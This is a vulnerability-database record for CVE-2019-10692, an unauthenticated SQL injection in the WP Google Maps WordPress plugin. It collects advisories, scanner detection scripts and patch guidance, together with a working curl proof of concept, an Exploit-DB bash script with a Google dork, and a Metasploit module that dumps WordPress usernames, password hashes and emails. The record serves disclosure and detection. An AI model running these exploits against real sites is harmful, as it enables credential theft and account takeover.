ID WPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA
Type wpexploit
Reporter wpvulndb
Modified 2020-11-19T06:03:54
Description
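In the WP Google Maps plugin for WordPress (versions 7.11.00 through 7.11.17, CVE-2019-10692), includes/class.rest-api.php in the plugin's REST API does not sanitize field names before placing them in a SELECT statement, leading to an unauthenticated SQL injection issue. The advisories collected in the records below give 7.11.18 or later as the fixed version.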
# Proof-of-concept request quoted from the advisory; example.com is a placeholder host.
# -k turns off TLS certificate verification (it has no effect on this http:// URL) and
# --silent suppresses curl's progress output.
# The query string addresses the plugin's REST route /wpgmza/v1/markers/ and carries SQL text
# in the `fields` parameter, the unsanitized field-name input the description refers to.
# NOTE(review): the `=3D` sequences look like quoted-printable residue from how the advisory
# was transported, so log review and WAF rules should key on the route together with SQL
# syntax in `fields` rather than on this literal string.
curl -k --silent "http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-"
{"id": "WPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection", "description": "The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.\n", "published": "2019-04-02T00:00:00", "modified": "2020-11-19T06:03:54", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "wpvulndb", "references": ["https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php", "https://packetstormsecurity.com/files/159640/", "https://vulners.com/exploitdb/EDB-ID:48918"], "cvelist": ["CVE-2019-10692"], "lastseen": "2021-02-15T22:32:04", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:709DAE2D-2952-4B3C-83D8-7E94508429A2"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0801"]}, {"type": "cve", "idList": ["CVE-2019-10692"]}, {"type": "exploitdb", "idList": ["EDB-ID:48918"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/WP_GOOGLE_MAPS_SQLI"]}, {"type": "nessus", "idList": ["WORDPRESS_WP_GOOGLE_MAPS_7_11_17_SQLI.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159640"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:709DAE2D-2952-4B3C-83D8-7E94508429A2"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0801"]}, {"type": "cve", "idList": ["CVE-2019-10692"]}, {"type": "exploitdb", "idList": ["EDB-ID:48918"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/WP_GOOGLE_MAPS_SQLI"]}, {"type": "nessus", "idList": ["WORDPRESS_WP_GOOGLE_MAPS_7_11_17_SQLI.NASL"]}, {"type": "openvas", 
"idList": ["OPENVAS:1361412562310142238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159640"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceData": "curl -k --silent \"http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-\"", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646193581}}
{"checkpoint_advisories": [{"lastseen": "2022-05-03T17:56:01", "description": "An SQL injection vulnerability exists in the WordPress Google Maps Plugin. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-01T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Google Maps Plugin SQL Injection (CVE-2019-10692)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2019-07-01T00:00:00", "id": "CPAI-2019-0801", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-20T20:39:06", "description": "", "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "WordPress Rest Google Maps SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10692"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159640", "href": "https://packetstormsecurity.com/files/159640/WordPress-Rest-Google-Maps-SQL-Injection.html", "sourceData": "`# Exploit Title: WordPress 
Rest Google Maps Plugin SQL Injection \n# Google Dork: inurl:index.php?rest_route=3D/wpgmza/ \n# Date: 2020-09-09 \n# Exploit Author: Jonatas Fil \n# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers \n# Software Link: https://wordpress.org/plugins/wp-google-maps/ \n# Version: < 7.11.18 \n# Tested on: Linux \n# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692) \n#!/bin/bash \n \nTARGET=\"192.168.1.77\" \n \ncurl -k --silent \n\"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&= \nfields=3D*+from+wp_users+--+-\" \n| jq \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159640/wprestgooglemaps-sql.txt"}], "attackerkb": [{"lastseen": "2021-07-20T20:17:44", "description": "In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.\n\n \n**Recent assessments:** \n \n**rootOptional** at March 09, 2020 9:03pm UTC reported:\n\nThis CVE is fairly obscure due to it being present in the WordPress plugin google-maps in versions between 7.11.00 and 7.11.17.\n\nThe way this is exploited is the plugin does not sanitise field names before a select statement. This results in it being vulnerable to sql injection. This can be exploited to dump credentials and password hashes for users within the database resulting in potential account takeover if these hashes aren\u2019t hashed correctly or if they use weak passwords.\n\nFor this, the plugin also needs to be out of date as it is easily patched by upgrading the plugin to the latest version. However, it isn\u2019t uncommon to find outdated plugins within WordPress sites. 
There is also a Metasploit module designed to automate the exploitation process\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2019-10692", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2020-07-30T00:00:00", "id": "AKB:709DAE2D-2952-4B3C-83D8-7E94508429A2", "href": "https://attackerkb.com/topics/IOu7SJQvG9/cve-2019-10692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-10-18T12:19:17", "description": "The WP Google Maps plugin for WordPress running on the remote web server is affected by an SQL injection (SQLi) vulnerability due to improper validation of user-supplied input. 
An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-03T00:00:00", "type": "nessus", "title": "WP Google Maps for WordPress < 7.11.17 Unauthenticated SQL Injection (CVE-2019-10692)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10692"], "modified": "2019-10-30T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_WP_GOOGLE_MAPS_7_11_17_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/123643", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123643);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/10/30 13:24:46\");\n\n script_cve_id(\"CVE-2019-10692\");\n\n script_name(english:\"WP Google Maps for WordPress < 7.11.17 Unauthenticated SQL Injection (CVE-2019-10692)\");\n script_summary(english:\"Checks for vulnerability.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected\nby an unauthenticated SQL injection vulnerability.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The WP Google Maps plugin for WordPress running on the remote web\nserver is affected by an SQL injection (SQLi) vulnerability due to\nimproper validation of user-supplied input. 
An unauthenticated,\nremote attacker can exploit this to inject or manipulate SQL queries\nin the back-end database, resulting in the disclosure or manipulation\nof arbitrary data.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wpvulndb.com/vulnerabilities/9249\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/wp-google-maps/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the WP Google Maps plugin for WordPress to version\n7.11.18 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10692\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(app_name:app, port:port);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\n\nurl = install_url + '/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%22nessus%22%3Atrue%7D&fields=user%28%29%20as%20user%5Fhostname%2Cversion%28%29%20as%20mysql%5Fversion%2Csysdate%28%29%20as%20nessus%5Fwas%5Fhere';\n\nplugin_name = \"WP Google Maps\";\n\nres = http_send_recv3(\n method:\"GET\",\n port:port,\n item:url,\n exit_on_fail:TRUE\n);\n\noutput = data_protection::sanitize_user_full_redaction(output:res[2]);\n\nif (\"nessus_was_here\" >< res[2])\n{\n security_report_v4(\n port:port,\n severity:SECURITY_HOLE,\n request:make_list(http_last_sent_request()),\n output:output,\n generic:TRUE,\n sqli:TRUE\n );\n}\nelse audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin_name + ' plugin');\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:32:04", "bulletinFamily": "software", "cvelist": ["CVE-2019-10692"], "description": "The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.\n\n### PoC\n\ncurl -k --silent \"http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter;=3D%7B%7D&=fields=3D*+from+wp_users+--+-\"\n", "modified": "2020-11-19T06:03:54", "published": "2019-04-02T00:00:00", "id": 
"WPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA", "href": "https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea", "type": "wpvulndb", "title": "WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-12T07:24:50", "description": "This module exploits a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-11T12:04:57", "type": "metasploit", "title": "WordPress Google Maps Plugin SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2019-04-15T12:06:27", "id": "MSF:AUXILIARY/ADMIN/HTTP/WP_GOOGLE_MAPS_SQLI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass 
MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(\n 'Name' => 'WordPress Google Maps Plugin SQL Injection',\n 'Description' => %q{\n This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.\n },\n 'Author' =>\n [\n 'Thomas Chauchefoin (Synacktiv)', # Vulnerability discovery, Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-10692'],\n ['WPVDB', '9249']\n ],\n 'DisclosureDate' => '2019-04-02'\n )\n\n register_options(\n [\n OptString.new('DB_PREFIX', [true, 'WordPress table prefix', 'wp_'])\n ])\n end\n\n def send_sql_request(sql_query)\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => {\n 'rest_route' => '/wpgmza/v1/markers',\n 'filter' => '{}',\n 'fields' => \"#{sql_query}-- -\",\n }\n )\n\n return nil if res.nil? 
|| res.code != 200 || res.body.nil?\n res.body\n end\n\n def check\n mynum = \"#{Rex::Text.rand_text_numeric(8..20)}\"\n body = send_sql_request(mynum)\n return Exploit::CheckCode::Unknown if body.nil?\n return Exploit::CheckCode::Vulnerable if body.include?(mynum)\n\n Exploit::CheckCode::Unknown\n end\n\n def run\n print_status(\"#{peer} - Trying to retrieve the #{datastore['DB_PREFIX']}users table...\")\n\n body = send_sql_request(\"* from #{datastore['DB_PREFIX']}users\")\n fail_with(Failure::UnexpectedReply, 'No response or unexpected status code in response') if body.nil?\n\n begin\n body = JSON.parse(body)\n rescue JSON::ParserError\n fail_with(Failure::NotFound, 'Returned data is not in JSON format')\n end\n\n if body.empty?\n print_error(\"#{peer} - Failed to retrieve the table #{datastore['DB_PREFIX']}users\")\n else\n loot = store_loot(\"wp_google_maps.json\",\"application/json\", rhost, body.to_s)\n print_good(\"Credentials saved in: #{loot}\")\n end\n\n body.each do |user|\n print_good(\"#{peer} - Found #{user['user_login']} #{user['user_pass']} #{user['user_email']}\")\n connection_details = {\n module_fullname: self.fullname,\n username: user['user_login'],\n private_data: user['user_pass'],\n private_type: :nonreplayable_hash,\n workspace_id: myworkspace_id,\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: user['user_email']\n }.merge(service_details)\n create_credential(connection_details)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/wp_google_maps_sqli.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:44:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-20T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2020-10-20T00:00:00", "id": "EDB-ID:48918", "href": "https://www.exploit-db.com/exploits/48918", "sourceData": "# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection\r\n# Google Dork: inurl:index.php?rest_route=3D/wpgmza/\r\n# Date: 2020-09-09\r\n# Exploit Author: Jonatas Fil\r\n# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers\r\n# Software Link: https://wordpress.org/plugins/wp-google-maps/\r\n# Version: < 7.11.18\r\n# Tested on: Linux\r\n# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)\r\n#!/bin/bash\r\n\r\nTARGET=\"192.168.1.77\"\r\n\r\ncurl -k --silent\r\n\"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=\r\nfields=3D*+from+wp_users+--+-\"\r\n| jq", "sourceHref": "https://www.exploit-db.com/download/48918", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10692"], "description": "WordPress WP Google Maps plugin is prone to an unauthenticated SQL injection\n vulnerability.", "modified": "2019-04-10T00:00:00", 
"published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310142238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142238", "type": "openvas", "title": "WordPress WP Google Maps Plugin < 7.11.18 SQL Injection Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142238\");\n script_version(\"2019-04-10T13:08:52+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-10 13:08:52 +0000 (Wed, 10 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 11:55:03 +0000 (Wed, 10 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10692\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress WP Google Maps Plugin < 7.11.18 SQL Injection Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n 
script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n\n script_tag(name:\"summary\", value:\"WordPress WP Google Maps plugin is prone to an unauthenticated SQL injection\n vulnerability.\");\n\n script_tag(name:\"insight\", value:\"The file includes/class.rest-api.php in the REST API does not sanitize field\n names before a SELECT statement which may lead to a SQL injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"affected\", value:\"WordPress WP Google Maps plugin before version 7.11.18.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.11.18 or later.\");\n\n script_xref(name:\"URL\", value:\"https://wordpress.org/plugins/wp-google-maps/#developers\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/11698\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nvt_strings = get_vt_strings();\n# '-' causes trouble in the injection\nvt_str = str_replace(string: vt_strings['default'], find: \"-\", replace: \"_\");\nrand = rand_str(length: 4, charset: \"01234456789\");\nmarker = vt_str + \"_\" + rand;\n\nurl = \"/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%22%22%3Atrue%7D\" +\n \"&fields=user%28%29%20as%20\" + vt_str + \"%5F\" + rand;\n\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (res =~ \"^HTTP/1\\.[01] 200\" && marker >< res) {\n report = 'It was possible to inject the function user() in the SQL statement.\\n\\nResponse:\\n\\n' +\n res;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-05-03T17:08:26", "description": "In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-02T18:30:00", "type": "cve", "title": "CVE-2019-10692", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2022-05-03T14:49:00", "cpe": [], "id": "CVE-2019-10692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}